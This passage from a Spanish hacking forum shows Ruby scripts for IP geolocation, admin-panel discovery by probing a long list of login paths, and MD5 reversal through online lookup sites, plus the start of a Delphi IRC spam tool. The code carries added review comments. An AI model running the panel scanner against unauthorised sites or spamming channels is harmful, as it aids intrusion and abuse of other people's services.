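  }
  place('relx'=>0.3,'rely'=>0.9)
end

Tk.mainloop

#The End ?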
Una imagen : Eso es todo.
Programación / Scripting / [Ruby] LocateIP 0.3
en: 27 Junio 2015, 01:18 am
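Un simple script en Ruby para localizar una IP y sus DNS. Version consola :

#!/usr/bin/ruby
#LocateIP 0.3
#(C) Doddy Hackman 2015

require "open-uri"
require "net/http"
require "resolv"

# Functions

# Resolves +hostname+ to one address.
#
# @param hostname [String]
# @return [String] the address, or the literal string "Error" on any failure
def get_ip(hostname)
  Resolv.getaddress(hostname)
rescue StandardError
  "Error"
end

# Fetches +web+ with a fixed browser-like User-Agent and returns the body.
#
# Uses URI.open rather than Kernel#open: since Ruby 3.0 Kernel#open no longer
# fetches URLs, and Kernel#open also treats a leading "|" as a command to run.
#
# @param web [String] absolute URL
# @return [String] response body, or "Error" on any failure
def toma(web)
  URI.open(web, "User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0").read
rescue StandardError
  "Error"
end

# Returns the HTTP status code of a GET for +web+ as a string.
# Any exception is reported as "404". Not called by this script.
def response_code(web)
  Net::HTTP.get_response(URI(web)).code
rescue StandardError
  "404"
end

# POSTs the already-encoded form body +arg+ to +web+ and returns the response
# body, or "Error" on any failure. The connection is built from host and port
# only, so the request is sent without TLS.
def tomar(web,arg)
  headers = {"User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0"}
  uri = URI(web)
  Net::HTTP.new(uri.host, uri.port).post(uri.path, arg, headers).body
rescue StandardError
  "Error"
end

# Prints the command-line usage line.
def uso
  print "\n[+] Sintax : ruby locateip.rb <target>\n"
end

# Prints the program banner.
def head
  print "\n\n-- == LocateIP 0.3 == --\n\n"
end

# Prints the closing credit line.
def copyright
  print "\n\n-- == (C) Doddy Hackman 2015 == --\n\n"
end

# Extracts the table cell that follows +label+ in the lookup page.
# Returns the cell text, or nil when the label is not present.
def campo(code, label)
  code =~ /#{Regexp.escape(label)}<\/td><td align=(.*)><b>(.*)<\/b><\/td>/ ? $2 : nil
end

# Resolves +target+, then prints the location fields and reverse-IP host
# names scraped from two public lookup pages.
#
# Both lookups are plain-HTTP requests to third-party sites, so those sites
# (and anything on the network path) see the address being queried. The
# replies are scraped HTML and are printed as received.
#
# @param target [String] host name to look up
def locateip(target)
  print "\n[+] Getting IP ...\n"
  ip = get_ip(target)

  # get_ip signals failure with the string "Error"; stop here instead of
  # submitting that string to the lookup services as if it were an address.
  if ip == "Error"
    print "\n[-] Could not resolve "+target+"\n"
    return
  end

  print "\n[+] IP : "+ip+"\n"

  web = "http://www.melissadata.com/lookups/iplocation.asp"
  print "\n[+] Locating ...\n\n"
  code = tomar(web,"ipaddress="+ip+"&btn=Submit")

  # One label per line; the not-found text now uses the same label as the
  # found text ("State or Region").
  ["City", "Country", "State or Region"].each do |label|
    print "[+] "+label+" : "+(campo(code, label) || "Not Found")+"\n"
  end

  print "\n[+] Getting DNS ...\n\n"
  code = toma("http://www.ip-adress.com/reverse_ip/"+ip)
  found = code.scan(/whois\/(.*?)\">Whois/).flatten.reject(&:empty?)

  # Terminate each entry with a newline so the names do not run together.
  found.each { |dns| print "[+] DNS Found : "+dns+"\n" }
  print "\n[-] DNS Not Found\n" if found.empty?
end

target = ARGV[0]

head

if target
  locateip(target)
else
  uso
end

copyright

#The End ?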
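Version Tk :

#!/usr/bin/ruby
#LocateIP 0.3
#(C) Doddy Hackman 2015

require "tk"
require "open-uri"
require "net/http"
require "resolv"

# Functions

# Resolves +hostname+ to one address, or returns "Error" on any failure.
def get_ip(hostname)
  Resolv.getaddress(hostname)
rescue StandardError
  "Error"
end

# Fetches +web+ with a fixed browser-like User-Agent and returns the body,
# or "Error" on any failure.
#
# Uses URI.open rather than Kernel#open: since Ruby 3.0 Kernel#open no longer
# fetches URLs, and Kernel#open also treats a leading "|" as a command to run.
def toma(web)
  URI.open(web, "User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0").read
rescue StandardError
  "Error"
end

# Returns the HTTP status code of a GET for +web+ as a string.
# Any exception is reported as "404". Not called by this script.
def response_code(web)
  Net::HTTP.get_response(URI(web)).code
rescue StandardError
  "404"
end

# POSTs the already-encoded form body +arg+ to +web+ and returns the response
# body, or "Error" on any failure. The request is sent without TLS.
def tomar(web,arg)
  headers = {"User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0"}
  uri = URI(web)
  Net::HTTP.new(uri.host, uri.port).post(uri.path, arg, headers).body
rescue StandardError
  "Error"
end

# Extracts the table cell that follows +label+ in the lookup page.
# Returns the cell text, or nil when the label is not present.
def campo(code, label)
  code =~ /#{Regexp.escape(label)}<\/td><td align=(.*)><b>(.*)<\/b><\/td>/ ? $2 : nil
end

#

window = TkRoot.new { title "LocateIP 0.3 (C) Doddy Hackman 2015" ; background "black" }
window['geometry'] = '300x300-20+10'

TkLabel.new(window) do
  background "black"
  foreground "yellow"
  text " Target : "
  place('relx'=>"0.1",'rely'=>"0.1")
end

# Entry widget holding the host name typed by the user.
target = TkEntry.new(window){
  background "black"
  foreground "yellow"
  width 25
  place('relx'=>0.3,'rely'=>0.1)
}

TkLabel.new(window) do
  background "black"
  foreground "yellow"
  text "Console"
  place('relx'=>0.4,'rely'=>0.2)
end

# Text widget used as the output console.
console = TkText.new(window) do
  background "black"
  foreground "yellow"
  width 30
  height 10
  place('relx'=>0.1,'rely'=>0.3)
end

TkButton.new(window) do
  text "Search"
  background "black"
  foreground "yellow"
  width 17
  activebackground "yellow"
  highlightbackground "yellow"
  command proc{
    # Read the entry into its own local. Assigning the string back to `target`
    # would replace the TkEntry, and the next click would then call `.value`
    # on a String.
    host = target.value.to_s

    console.insert("end", "[+] Getting IP ...\n")
    ip = get_ip(host)

    if ip == "Error"
      # get_ip signals failure with the string "Error"; do not submit that
      # string to the lookup services as if it were an address.
      console.insert("end", "\n[-] Could not resolve "+host+"\n")
    else
      # Both lookups are plain-HTTP requests to third-party sites, which
      # therefore see the queried address; replies are shown as received.
      web = "http://www.melissadata.com/lookups/iplocation.asp"
      console.insert("end", "\n[+] Locating ...\n\n")
      code = tomar(web,"ipaddress="+ip+"&btn=Submit")

      ["City", "Country", "State or Region"].each do |label|
        console.insert("end", "[+] "+label+" : "+(campo(code, label) || "Not Found")+"\n")
      end

      console.insert("end","\n[+] Getting DNS ...\n\n")
      code = toma("http://www.ip-adress.com/reverse_ip/"+ip)
      found = code.scan(/whois\/(.*?)\">Whois/).flatten.reject(&:empty?)

      # Terminate each entry with a newline so the names do not run together.
      found.each { |dns| console.insert("end", "[+] DNS Found : "+dns+"\n") }
      console.insert("end","\n[-] DNS Not Found\n") if found.empty?
    end

    console.insert("end","\n\n[+] Finished")
  }
  place('relx'=>0.3,'rely'=>0.9)
end

Tk.mainloop

#The End ?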
Una imagen : Eso es todo.
Programación / Scripting / [Ruby] PanelFinder 0.5
en: 12 Junio 2015, 23:52 pm
Un simple script en Ruby para buscar el panel de administracion de una pagina. Version consola :

#!/usr/bin/ruby
#PanelFinder 0.5
#(C) Doddy Hackman 2015
#
# Requests a fixed list of administration/login paths under a base URL and
# prints the ones answered with status 200.
#
# NOTE(defender): every list entry is requested once, in list order, through
# Net::HTTP.get_response with no custom headers (response_code sets none). In
# a server access log this presumably appears as a dense run of requests for
# admin- and login-style paths from one client, most of them not found.
# Administrative interfaces should depend on authentication and network
# restrictions, not on an unlisted path.

require "open-uri"
require "net/http"

# Functions

# Fetches +web+ with a fixed browser-like User-Agent and returns the body, or
# "Error" on any exception. Not called anywhere in this script.
# NOTE(review): this relies on Kernel#open accepting URLs through open-uri,
# which Ruby 3.0 removed (URI.open is the replacement); Kernel#open also
# treats a leading "|" as a command to run.
def toma(web)
  begin
    return open(web, "User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0").read
  rescue
    return "Error"
  end
end

# Returns the status code of a GET for +web+ as a string; any exception is
# reported as "404".
def response_code(web)
  begin
    return Net::HTTP.get_response(URI(web)) .code
  rescue
    return "404"
  end
end

# POSTs the form body +arg+ to +web+ and returns the response body, or "Error"
# on any exception. Not called anywhere in this script.
def tomar(web,arg)
  begin
    headers = {"User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0"}
    uri = URI(web)
    http = Net::HTTP.new(uri.host, uri.port)
    return http.post(uri.path,arg, headers).body
  rescue
    return "Error"
  end
end

# Requests page + "/" + entry for every entry of the built-in list and prints
# each URL whose status string equals "200".
# presumably +page+ carries the scheme (response_code hands the joined string
# to URI()) — confirm against how the script is invoked.
def find_panel(page)
  panels = ['admin/admin.asp','admin/login.asp','admin/index.asp','admin/admin.aspx','admin/login.aspx','admin/index.aspx',
    'admin/webmaster.asp','admin/webmaster.aspx','asp/admin/index.asp','asp/admin/index.aspx','asp/admin/admin.asp',
    'asp/admin/admin.aspx','asp/admin/webmaster.asp','asp/admin/webmaster.aspx','admin/','login.asp','login.aspx',
    'admin.asp','admin.aspx','webmaster.aspx','webmaster.asp','login/index.asp','login/index.aspx','login/login.asp',
    'login/login.aspx','login/admin.asp','login/admin.aspx','administracion/index.asp','administracion/index.aspx',
    'administracion/login.asp','administracion/login.aspx','administracion/webmaster.asp','administracion/webmaster.aspx',
    'administracion/admin.asp','administracion/admin.aspx','php/admin/','admin/admin.php','admin/index.php',
    'admin/login.php','admin/system.php','admin/ingresar.php','admin/administrador.php','admin/default.php',
    'administracion/','administracion/index.php','administracion/login.php','administracion/ingresar.php',
    'administracion/admin.php','administration/','administration/index.php','administration/login.php',
    'administrator/index.php','administrator/login.php','administrator/system.php','system/','system/login.php',
    'admin.php','login.php','administrador.php','administration.php','administrator.php','admin1.html','admin1.php',
    'admin2.php','admin2.html','yonetim.php','yonetim.html','yonetici.php','yonetici.html','adm/','admin/account.php',
    'admin/account.html','admin/index.html','admin/login.html','admin/home.php','admin/controlpanel.html',
    'admin/controlpanel.php','admin.html','admin/cp.php','admin/cp.html','cp.php','cp.html','administrator/',
    'administrator/index.html','administrator/login.html','administrator/account.html','administrator/account.php',
    'administrator.html','login.html','modelsearch/login.php','moderator.php','moderator.html','moderator/login.php',
    'moderator/login.html','moderator/admin.php','moderator/admin.html','moderator/','account.php','account.html',
    'controlpanel/','controlpanel.php','controlpanel.html','admincontrol.php','admincontrol.html','adminpanel.php',
    'adminpanel.html','admin1.asp','admin2.asp','yonetim.asp','yonetici.asp','admin/account.asp','admin/home.asp',
    'admin/controlpanel.asp','admin/cp.asp','cp.asp','administrator/index.asp','administrator/login.asp',
    'administrator/account.asp','administrator.asp','modelsearch/login.asp','moderator.asp','moderator/login.asp',
    'moderator/admin.asp','account.asp','controlpanel.asp','admincontrol.asp','adminpanel.asp','fileadmin/',
    'fileadmin.php','fileadmin.asp','fileadmin.html','administration.html','sysadmin.php','sysadmin.html',
    'phpmyadmin/','myadmin/','sysadmin.asp','sysadmin/','ur-admin.asp','ur-admin.php','ur-admin.html','ur-admin/',
    'Server.php','Server.html','Server.asp','Server/','wp-admin/','administr8.php','administr8.html','administr8/',
    'administr8.asp','webadmin/','webadmin.php','webadmin.asp','webadmin.html','administratie/','admins/','admins.php',
    'admins.asp','admins.html','administrivia/','Database_Administration/','WebAdmin/','useradmin/','sysadmins/',
    'admin1/','system-administration/','administrators/','pgadmin/','directadmin/','staradmin/',
    'ServerAdministrator/','SysAdmin/','administer/','LiveUser_Admin/','sys-admin/','typo3/','panel/','cpanel/',
    'cPanel/','cpanel_file/','platz_login/','rcLogin/','blogindex/','formslogin/','autologin/','support_login/',
    'meta_login/','manuallogin/','simpleLogin/','loginflat/','utility_login/','showlogin/','memlogin/','members/',
    'login-redirect/','sub-login/','wp-login/','login1/','dir-login/','login_db/','xlogin/','smblogin/',
    'customer_login/','UserLogin/','login-us/','acct_login/','admin_area/','bigadmin/','project-admins/',
    'phppgadmin/','pureadmin/','sql-admin/','radmind/','openvpnadmin/','wizmysqladmin/','vadmind/','ezsqliteadmin/',
    'hpwebjetadmin/','newsadmin/','adminpro/','Lotus_Domino_Admin/','bbadmin/','vmailadmin/','Indy_admin/',
    'ccp14admin/','irc-macadmin/','banneradmin/','sshadmin/','phpldapadmin/','macadmin/','administratoraccounts/',
    'admin4_account/','admin4_colon/','radmind-1/','Super-Admin/','AdminTools/','cmsadmin/','SysAdmin2/',
    'globes_admin/','cadmins/','phpSQLiteAdmin/','navSiteAdmin/','server_admin_small/','logo_sysadmin/','server/',
    'database_administration/','power_user/','system_administration/','ss_vms_admin_sm/']

  print "\n[+] Scanning ...\n\n"

  # "1" once at least one URL has been printed.
  control = "0"

  panels.each do |panel|
    begin
      url = page+"/"+panel
      status_code = response_code(url)
      if status_code=="200"
        print "[+] Link : "+url+"\n"
        control = "1"
      end
    end
  end

  if control=="1"
    print "\n[+] Finished\n"
  else
    print "\n[-] Not Found\n"
  end
end

# Prints the command-line usage line.
def uso
  print "\n[+] Sintax : ruby panel_finder.rb <page>\n"
end

# Prints the program banner.
def head
  print "\n\n-- == Panel Finder 0.5 == --\n\n"
end

# Prints the closing credit line.
def copyright
  print "\n\n-- == (C) Doddy Hackman 2015 == --\n\n"
end

page = ARGV[0]

head()

if !page
  uso()
else
  find_panel(page)
end

copyright()

#The End ?
Version Tk :

#!/usr/bin/ruby
#PanelFinder 0.5
#(C) Doddy Hackman 2015
#
# Tk front end: requests a fixed list of administration/login paths under the
# URL typed into the entry field and lists the ones answered with status 200.
#
# NOTE(defender): every list entry is requested once, in list order, through
# Net::HTTP.get_response with no custom headers (response_code sets none). In
# a server access log this presumably appears as a dense run of requests for
# admin- and login-style paths from one client, most of them not found.

require "tk"
require "open-uri"
require "net/http"

# Functions

# Fetches +web+ with a fixed browser-like User-Agent and returns the body, or
# "Error" on any exception. Not called anywhere in this script.
# NOTE(review): this relies on Kernel#open accepting URLs through open-uri,
# which Ruby 3.0 removed (URI.open is the replacement); Kernel#open also
# treats a leading "|" as a command to run.
def toma(web)
  begin
    return open(web, "User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0").read
  rescue
    return "Error"
  end
end

# Returns the status code of a GET for +web+ as a string; any exception is
# reported as "404".
def response_code(web)
  begin
    return Net::HTTP.get_response(URI(web)) .code
  rescue
    return "404"
  end
end

# POSTs the form body +arg+ to +web+ and returns the response body, or "Error"
# on any exception. Not called anywhere in this script.
def tomar(web,arg)
  begin
    headers = {"User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0"}
    uri = URI(web)
    http = Net::HTTP.new(uri.host, uri.port)
    return http.post(uri.path,arg, headers).body
  rescue
    return "Error"
  end
end

#

window = TkRoot.new { title "PanelFinder 0.5 (C) Doddy Hackman 2015" ; background "black" }
window['geometry'] = '300x300-20+10'

TkLabel.new(window) do
  background "black"
  foreground "orange"
  text " Page : "
  place('relx'=>"0.1",'rely'=>"0.1")
end

# Entry widget holding the base URL typed by the user.
page = TkEntry.new(window){
  background "black"
  foreground "orange"
  width 25
  place('relx'=>0.3,'rely'=>0.1)
}

TkLabel.new(window) do
  background "black"
  foreground "orange"
  text "Console"
  place('relx'=>0.4,'rely'=>0.2)
end

# Text widget used as the output console.
console =TkText.new(window) do
  background "black"
  foreground "orange"
  width 30
  height 10
  place('relx'=>0.1,'rely'=>0.3)
end

TkButton.new(window) do
  text "Search"
  background "black"
  foreground "orange"
  width 17
  activebackground "orange"
  highlightbackground "orange"
  command proc{
    # NOTE(review): this rebinds `page`, which until now held the TkEntry, to
    # a String; a second press of the button would then call `.value` on that
    # String. A separate local for the text would avoid it — confirm.
    page = page.value.to_s
    panels = ['admin/admin.asp','admin/login.asp','admin/index.asp','admin/admin.aspx','admin/login.aspx','admin/index.aspx',
      'admin/webmaster.asp','admin/webmaster.aspx','asp/admin/index.asp','asp/admin/index.aspx','asp/admin/admin.asp',
      'asp/admin/admin.aspx','asp/admin/webmaster.asp','asp/admin/webmaster.aspx','admin/','login.asp','login.aspx',
      'admin.asp','admin.aspx','webmaster.aspx','webmaster.asp','login/index.asp','login/index.aspx','login/login.asp',
      'login/login.aspx','login/admin.asp','login/admin.aspx','administracion/index.asp','administracion/index.aspx',
      'administracion/login.asp','administracion/login.aspx','administracion/webmaster.asp','administracion/webmaster.aspx',
      'administracion/admin.asp','administracion/admin.aspx','php/admin/','admin/admin.php','admin/index.php',
      'admin/login.php','admin/system.php','admin/ingresar.php','admin/administrador.php','admin/default.php',
      'administracion/','administracion/index.php','administracion/login.php','administracion/ingresar.php',
      'administracion/admin.php','administration/','administration/index.php','administration/login.php',
      'administrator/index.php','administrator/login.php','administrator/system.php','system/','system/login.php',
      'admin.php','login.php','administrador.php','administration.php','administrator.php','admin1.html','admin1.php',
      'admin2.php','admin2.html','yonetim.php','yonetim.html','yonetici.php','yonetici.html','adm/','admin/account.php',
      'admin/account.html','admin/index.html','admin/login.html','admin/home.php','admin/controlpanel.html',
      'admin/controlpanel.php','admin.html','admin/cp.php','admin/cp.html','cp.php','cp.html','administrator/',
      'administrator/index.html','administrator/login.html','administrator/account.html','administrator/account.php',
      'administrator.html','login.html','modelsearch/login.php','moderator.php','moderator.html','moderator/login.php',
      'moderator/login.html','moderator/admin.php','moderator/admin.html','moderator/','account.php','account.html',
      'controlpanel/','controlpanel.php','controlpanel.html','admincontrol.php','admincontrol.html','adminpanel.php',
      'adminpanel.html','admin1.asp','admin2.asp','yonetim.asp','yonetici.asp','admin/account.asp','admin/home.asp',
      'admin/controlpanel.asp','admin/cp.asp','cp.asp','administrator/index.asp','administrator/login.asp',
      'administrator/account.asp','administrator.asp','modelsearch/login.asp','moderator.asp','moderator/login.asp',
      'moderator/admin.asp','account.asp','controlpanel.asp','admincontrol.asp','adminpanel.asp','fileadmin/',
      'fileadmin.php','fileadmin.asp','fileadmin.html','administration.html','sysadmin.php','sysadmin.html',
      'phpmyadmin/','myadmin/','sysadmin.asp','sysadmin/','ur-admin.asp','ur-admin.php','ur-admin.html','ur-admin/',
      'Server.php','Server.html','Server.asp','Server/','wp-admin/','administr8.php','administr8.html','administr8/',
      'administr8.asp','webadmin/','webadmin.php','webadmin.asp','webadmin.html','administratie/','admins/','admins.php',
      'admins.asp','admins.html','administrivia/','Database_Administration/','WebAdmin/','useradmin/','sysadmins/',
      'admin1/','system-administration/','administrators/','pgadmin/','directadmin/','staradmin/',
      'ServerAdministrator/','SysAdmin/','administer/','LiveUser_Admin/','sys-admin/','typo3/','panel/','cpanel/',
      'cPanel/','cpanel_file/','platz_login/','rcLogin/','blogindex/','formslogin/','autologin/','support_login/',
      'meta_login/','manuallogin/','simpleLogin/','loginflat/','utility_login/','showlogin/','memlogin/','members/',
      'login-redirect/','sub-login/','wp-login/','login1/','dir-login/','login_db/','xlogin/','smblogin/',
      'customer_login/','UserLogin/','login-us/','acct_login/','admin_area/','bigadmin/','project-admins/',
      'phppgadmin/','pureadmin/','sql-admin/','radmind/','openvpnadmin/','wizmysqladmin/','vadmind/','ezsqliteadmin/',
      'hpwebjetadmin/','newsadmin/','adminpro/','Lotus_Domino_Admin/','bbadmin/','vmailadmin/','Indy_admin/',
      'ccp14admin/','irc-macadmin/','banneradmin/','sshadmin/','phpldapadmin/','macadmin/','administratoraccounts/',
      'admin4_account/','admin4_colon/','radmind-1/','Super-Admin/','AdminTools/','cmsadmin/','SysAdmin2/',
      'globes_admin/','cadmins/','phpSQLiteAdmin/','navSiteAdmin/','server_admin_small/','logo_sysadmin/','server/',
      'database_administration/','power_user/','system_administration/','ss_vms_admin_sm/']

    console.insert("end", "[+] Scanning ...\n\n")

    # "1" once at least one URL has been listed.
    control = "0"

    # The whole loop runs inside the button callback.
    panels.each do |panel|
      begin
        url = page+"/"+panel
        status_code = response_code(url)
        if status_code=="200"
          console.insert("end","[+] Link : "+url+"\n")
          control = "1"
        end
      end
    end

    if control=="1"
      console.insert("end","\n[+] Finished")
    else
      console.insert("end","\n[-] Not Found")
    end
  }
  place('relx'=>0.3,'rely'=>0.9)
end

Tk.mainloop

#The End ?
Una imagen : Eso es todo.
Programación / Scripting / [Ruby] MD5 Cracker 0.2
|
en: 29 Mayo 2015, 16:37 pm
|
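# A simple Ruby script to crack an MD5 hash. Console version:
#!/usr/bin/ruby
# MD5 Cracker 0.2
# (C) Doddy Hackman 2015
#
# Looks an MD5 digest up on three public lookup sites and prints whatever
# plaintext each one reports.
#
# Note: the digest is sent to third-party sites over plain HTTP, so it is
# disclosed to those sites and to anyone on the network path.

require "open-uri"
require "net/http"

USER_AGENT = "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0"

# An MD5 digest is exactly 32 hex digits. \A and \z anchor the whole string,
# so a value with an embedded newline cannot pass.
MD5_HEX = /\A\h{32}\z/

# One entry per lookup site: the label printed to the user, the endpoint, the
# form field that carries the digest, any fixed extra fields, and the pattern
# that captures the plaintext in the response body.
LOOKUP_SERVICES = [
  {
    :label => "md5online.net",
    :url => "http://md5online.net/index.php",
    :field => "pass",
    :extra => { "option" => "hash2text", "send" => "Submit" },
    :pattern => /pass : <b>(.*?)<\/b>/
  },
  {
    :label => "md5.my-addr.co",
    :url => "http://md5.my-addr.com/md5_decrypt-md5_cracker_online/md5_decoder_tool.php",
    :field => "md5",
    :extra => {},
    :pattern => /<span class='middle_title'>Hashed string<\/span>: (.*?)<\/div>/
  },
  {
    :label => "md5decryption.com",
    :url => "http://md5decryption.com/index.php",
    :field => "hash",
    :extra => { "submit" => "Decrypt It!" },
    :pattern => /Decrypted Text: <\/b>(.*?)<\/font>/
  }
].freeze

# Functions

# Fetches a page over HTTP(S) and returns its body.
#
# The original passed +web+ straight to Kernel#open, which treats a string
# starting with "|" as a command to run and any other non-URL string as a
# local path (and on Ruby 3.0+ no longer fetches URLs at all). The string is
# now parsed first and only http/https URIs are opened.
#
# @param web [String] URL to fetch
# @return [String] the response body, or "Error" on any failure
def toma(web)
  uri = URI.parse(web)
  return "Error" unless uri.is_a?(URI::HTTP) # URI::HTTPS is a subclass

  uri.open("User-Agent" => USER_AGENT).read
rescue StandardError
  "Error"
end

# Returns the HTTP status code of a GET request as a string.
#
# @param web [String] URL to request
# @return [String] status code such as "200", or "404" on any failure
def response_code(web)
  Net::HTTP.get_response(URI(web)).code
rescue StandardError
  "404"
end

# Sends a form-encoded POST and returns the response body.
#
# @param web [String] URL to post to
# @param arg [String] already-encoded request body
# @return [String] the response body, or "Error" on any failure
def tomar(web, arg)
  uri = URI(web)
  http = Net::HTTP.new(uri.host, uri.port)
  http.use_ssl = uri.scheme == "https"
  # request_uri is never empty ("/" for a bare host) and keeps any query string.
  http.post(uri.request_uri, arg, "User-Agent" => USER_AGENT).body
rescue StandardError
  "Error"
end

# Queries each lookup service for the digest and prints one result line each.
#
# The argument is validated before anything is sent, and the request body is
# built with URI.encode_www_form so that values such as "Decrypt It!" are
# encoded instead of being concatenated raw into the body.
#
# @param md5 [String] the digest to look up (32 hex digits)
# @return [nil]
def crack(md5)
  unless md5 =~ MD5_HEX
    print "\n[-] Invalid MD5 hash (expected 32 hex characters)\n"
    return
  end

  print "\n[+] Cracking ...\n\n"

  LOOKUP_SERVICES.each do |service|
    body = URI.encode_www_form({ service[:field] => md5 }.merge(service[:extra]))
    page = tomar(service[:url], body).to_s

    if page =~ service[:pattern]
      print "[+] #{service[:label]} -> #{Regexp.last_match(1)}\n"
    else
      print "[-] #{service[:label]} -> Not Found\n"
    end
  end

  print "\n[+] Finished"
end

# Prints the command-line syntax.
def uso
  print "\n[+] Sintax : ruby md5cracker.rb <md5>\n"
end

# Prints the banner.
def head
  print "\n\n-- == MD5 Cracker 0.2 == --\n\n"
end

# Prints the copyright footer.
def copyright
  print "\n\n-- == (C) Doddy Hackman 2015 == --\n\n"
end

#

md5 = ARGV[0]

head
if md5
  crack(md5)
else
  uso
end
copyright

#The End ?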
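# Tk version:
#!/usr/bin/ruby
# MD5 Cracker 0.2
# (C) Doddy Hackman 2015
#
# Same lookup as the console version, with a small Tk window: an entry for
# the digest, a text widget used as a console, and a "Crack It" button.
#
# Note: the digest is sent to third-party sites over plain HTTP, so it is
# disclosed to those sites and to anyone on the network path.

require "tk"
require "open-uri"
require "net/http"

USER_AGENT = "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0"

# An MD5 digest is exactly 32 hex digits; \A and \z anchor the whole string.
MD5_HEX = /\A\h{32}\z/

# One entry per lookup site: the label shown to the user, the endpoint, the
# form field that carries the digest, any fixed extra fields, and the pattern
# that captures the plaintext in the response body.
LOOKUP_SERVICES = [
  {
    :label => "md5online.net",
    :url => "http://md5online.net/index.php",
    :field => "pass",
    :extra => { "option" => "hash2text", "send" => "Submit" },
    :pattern => /pass : <b>(.*?)<\/b>/
  },
  {
    :label => "md5.my-addr.co",
    :url => "http://md5.my-addr.com/md5_decrypt-md5_cracker_online/md5_decoder_tool.php",
    :field => "md5",
    :extra => {},
    :pattern => /<span class='middle_title'>Hashed string<\/span>: (.*?)<\/div>/
  },
  {
    :label => "md5decryption.com",
    :url => "http://md5decryption.com/index.php",
    :field => "hash",
    :extra => { "submit" => "Decrypt It!" },
    :pattern => /Decrypted Text: <\/b>(.*?)<\/font>/
  }
].freeze

# Functions

# Fetches a page over HTTP(S) and returns its body.
#
# The string is parsed first and only http/https URIs are opened; passing it
# straight to Kernel#open, as the original did, would run a command for input
# starting with "|" and open a local file for any other non-URL string.
#
# @param web [String] URL to fetch
# @return [String] the response body, or "Error" on any failure
def toma(web)
  uri = URI.parse(web)
  return "Error" unless uri.is_a?(URI::HTTP) # URI::HTTPS is a subclass

  uri.open("User-Agent" => USER_AGENT).read
rescue StandardError
  "Error"
end

# Returns the HTTP status code of a GET request as a string.
#
# @param web [String] URL to request
# @return [String] status code such as "200", or "404" on any failure
def response_code(web)
  Net::HTTP.get_response(URI(web)).code
rescue StandardError
  "404"
end

# Sends a form-encoded POST and returns the response body.
#
# @param web [String] URL to post to
# @param arg [String] already-encoded request body
# @return [String] the response body, or "Error" on any failure
def tomar(web, arg)
  uri = URI(web)
  http = Net::HTTP.new(uri.host, uri.port)
  http.use_ssl = uri.scheme == "https"
  # request_uri is never empty ("/" for a bare host) and keeps any query string.
  http.post(uri.request_uri, arg, "User-Agent" => USER_AGENT).body
rescue StandardError
  "Error"
end

#

window = TkRoot.new { title "MD5 Cracker 0.2 (C) Doddy Hackman 2015" ; background "black" }
window['geometry'] = '300x300-20+10'

TkLabel.new(window) do
  background "black"
  foreground "green"
  text " MD5 : "
  place('relx'=>"0.1",'rely'=>"0.1")
end

md5 = TkEntry.new(window){
  background "black"
  foreground "green"
  width 25
  place('relx'=>0.3,'rely'=>0.1)
}

TkLabel.new(window) do
  background "black"
  foreground "green"
  text "Console"
  place('relx'=>0.4,'rely'=>0.2)
end

console =TkText.new(window) do
  background "black"
  foreground "green"
  width 30
  height 10
  place('relx'=>0.1,'rely'=>0.3)
end

TkButton.new(window) do
  text "Crack It"
  background "black"
  foreground "green"
  width 17
  activebackground "green"
  highlightbackground "green"
  command proc{
    # Read the entry into its own local. The original assigned the string back
    # to `md5`, replacing the TkEntry in the enclosing scope, so a second click
    # called #value on a String and failed.
    digest = md5.value.to_s.strip

    if digest =~ MD5_HEX
      console.insert("end","[+] Cracking ...\n\n")

      LOOKUP_SERVICES.each do |service|
        # Form-encode the body so values such as "Decrypt It!" are sent encoded.
        body = URI.encode_www_form({ service[:field] => digest }.merge(service[:extra]))
        page = tomar(service[:url], body).to_s

        if page =~ service[:pattern]
          console.insert("end","[+] #{service[:label]} -> #{Regexp.last_match(1)}\n")
        else
          console.insert("end","[-] #{service[:label]} -> Not Found\n")
        end
      end

      console.insert("end","\n[+] Finished\n" )
    else
      # Nothing is sent to the lookup sites unless the input is a valid digest.
      console.insert("end","[-] Invalid MD5 hash (expected 32 hex characters)\n")
    end
  }
  place('relx'=>0.3,'rely'=>0.9)
end

Tk.mainloop

#The End ?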
Una imagen : Eso es todo.
|
|
|
59
|
Programación / Programación General / [Delphi] KingSpam 0.4
|
en: 22 Mayo 2015, 17:23 pm
|
Un simple programa para hacer spam en canales IRC , tambien puede listar canales y usuarios. Es algo inestable les recomiendo la version en Perl. Una imagen : // KingSpam 0.4 // (C) Doddy Hackman 2015 unit spam; interface uses Winapi.Windows, Winapi.Messages, System.SysUtils, System.Variants, System.Classes, Vcl.Graphics, Vcl.Controls, Vcl.Forms, Vcl.Dialogs, Vcl.ComCtrls, Vcl.StdCtrls, Vcl.Imaging.pngimage, Vcl.ExtCtrls, IdContext, IdBaseComponent, IdComponent, IdTCPConnection, IdTCPClient, IdCmdTCPClient, IdIRC, PerlRegEx, Vcl.Menus, ShellApi; type TForm1 = class(TForm) PageControl1: TPageControl; TabSheet1: TTabSheet; GroupBox1: TGroupBox; Label1: TLabel; host: TEdit; Label2: TLabel; port: TEdit; Label3: TLabel; nombre: TEdit; Label4: TLabel; canal: TEdit; Label5: TLabel; spam: TEdit; Button1: TButton; Button2: TButton; Button3: TButton; TabSheet2: TTabSheet; GroupBox2: TGroupBox; GroupBox3: TGroupBox; canales: TListBox; users: TListBox; TabSheet3: TTabSheet; GroupBox4: TGroupBox; GroupBox5: TGroupBox; lista_canales: TListBox; console1: TMemo; Label6: TLabel; canal_agregar: TEdit; Button4: TButton; Button5: TButton; TabSheet5: TTabSheet; GroupBox8: TGroupBox; console2: TMemo; IdIRC1: TIdIRC; Button9: 